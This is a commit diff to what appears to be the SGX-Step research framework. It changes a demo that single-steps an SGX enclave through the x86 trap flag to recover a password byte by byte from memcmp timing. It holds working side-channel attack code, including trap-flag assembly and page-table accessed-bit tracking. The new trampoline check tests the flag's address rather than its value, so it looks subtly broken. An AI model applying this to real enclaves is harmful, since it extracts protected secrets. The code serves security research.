app/memcmp: improve rflags.tf simulation stepping

Author: jovanbulck

app/memcmp/main.c

@@ -15,7 +15,7 @@
 #include <sys/mman.h>
 
 #define MAX_LEN            15
-#define DO_TIMER_STEP      1
+#define DO_TIMER_STEP      0
 #define DEBUG              0
 #define DBG_ENCL           1
 #if DO_TIMER_STEP
@@ -33,6 +33,15 @@
     #warning "Using simulated stepping through HW trap flag; will not work for production enclaves!"
 #endif
 
+/*
+ * NOTE: set DO_TIMER_STEP=0 to _simulate_ a single-stepping attack through the
+ * x86 hardware trap flag (RFLAGS.TF). Use for demonstration/debugging purposes
+ * only, as this does _not_ work for SGX debug enclaves(!)
+ */
+#if !DO_TIMER_STEP
+    #warning "Using simulated stepping through HW trap flag; will not work for production enclaves!"
+#endif
+
 sgx_enclave_id_t eid = 0;
 int irq_cnt = 0, do_irq = 0, fault_cnt = 0, trigger_cnt = 0, step_cnt = 0;
 uint64_t *pte_encl = NULL, *pte_trigger = NULL, *pmd_encl = NULL;
@@ -74,7 +83,7 @@ void aep_cb_func(void)
      * referencing the enclave code page about to be executed, so as to be able
      * to filter out "zero-step" results that won't set the accessed bit.
      */
-    if (ACCESSED(*pte_encl)) step_cnt++;
+    if (do_irq && ACCESSED(*pte_encl)) step_cnt++;
     *pte_encl = MARK_NOT_ACCESSED( *pte_encl );
     *pte_trigger = MARK_NOT_ACCESSED(*pte_trigger);
 
@@ -92,8 +101,6 @@ void aep_cb_func(void)
         *pmd_encl = MARK_NOT_ACCESSED( *pmd_encl );
 #if DO_TIMER_STEP
         apic_timer_irq( SGX_STEP_TIMER_INTERVAL );
-#else
-        ENABLE_TF;
 #endif
     }
 }
@@ -117,6 +124,7 @@ void fault_handler(int signo, siginfo_t * si, void  *ctx)
             #endif
             ASSERT(!mprotect(trigger_adrs, 4096, PROT_READ | PROT_WRITE));
             do_irq = 1;
+            sgx_step_do_trap = 1;
         }
         else
         {
@@ -130,6 +138,10 @@ void fault_handler(int signo, siginfo_t * si, void  *ctx)
         #if DEBUG
             //info("Caught single-step trap (RIP=%p)\n", si->si_addr);
         #endif
+
+        /* ensure RFLAGS.TF is clear to disable debug single-stepping */
+        ucontext_t *uc = (ucontext_t *) ctx;
+        uc->uc_mcontext.gregs[REG_EFL] &= ~0x100;
         break;
     #endif
 
@@ -234,6 +246,7 @@ int main( int argc, char **argv )
         for (int j = 0; j < pwd_len; j++) pwd[j] = '*';
         pwd[pwd_len] = '\0';
         do_irq = 0; trigger_cnt = 0, step_cnt = 0, fault_cnt = 0;
+        sgx_step_do_trap = 0;
         ASSERT(!mprotect(trigger_adrs, 4096, PROT_NONE ));
         SGX_ASSERT( memcmp_pwd(eid, &pwd_success, pwd) );
 
@@ -261,6 +274,7 @@ int main( int argc, char **argv )
         {
             pwd[i] = j;
             do_irq = 0; trigger_cnt = 0, step_cnt = 0, fault_cnt = 0;
+            sgx_step_do_trap = 0;
             ASSERT(!mprotect(trigger_adrs, 4096, PROT_NONE ));
             SGX_ASSERT( memcmp_pwd(eid, &pwd_success, pwd) );
 

libsgxstep/aep_trampoline.S

@@ -79,6 +79,15 @@ sgx_step_aep_trampoline:
 
     mov $3, %xax                        /* ERESUME leaf */
 
+
+    /* optionally set RFLAGS.TF to enable simulated single-stepping for DEBUG enclaves */
+    lea sgx_step_do_trap(%rip), %rdx
+    test %rdx, %rdx
+    je sgx_step_aep_eresume
+    pushf
+    orl $0x100, (%rsp)
+    popf
+
 .global sgx_step_aep_eresume
 sgx_step_aep_eresume:
     .byte 0x0f, 0x01, 0xd7              /* ENCLU */

libsgxstep/enclave.c

@@ -38,6 +38,7 @@ extern void sgx_step_aep_trampoline(void);
 aep_cb_t sgx_step_aep_cb = NULL;
 uint64_t nemesis_tsc_eresume = 0x0;
 int sgx_step_eresume_cnt = 0;
+int sgx_step_do_trap = 0;
 
 extern int fd_step;
 struct sgx_step_enclave_info victim = {0};

libsgxstep/enclave.h

@@ -36,6 +36,7 @@ struct sgx_step_enclave_info
 
 extern uint64_t nemesis_tsc_eresume, nemesis_tsc_aex;
 extern int sgx_step_eresume_cnt;
+extern int sgx_step_do_trap;
 
 typedef void (*aep_cb_t)(void);
 void register_aep_cb(aep_cb_t cb);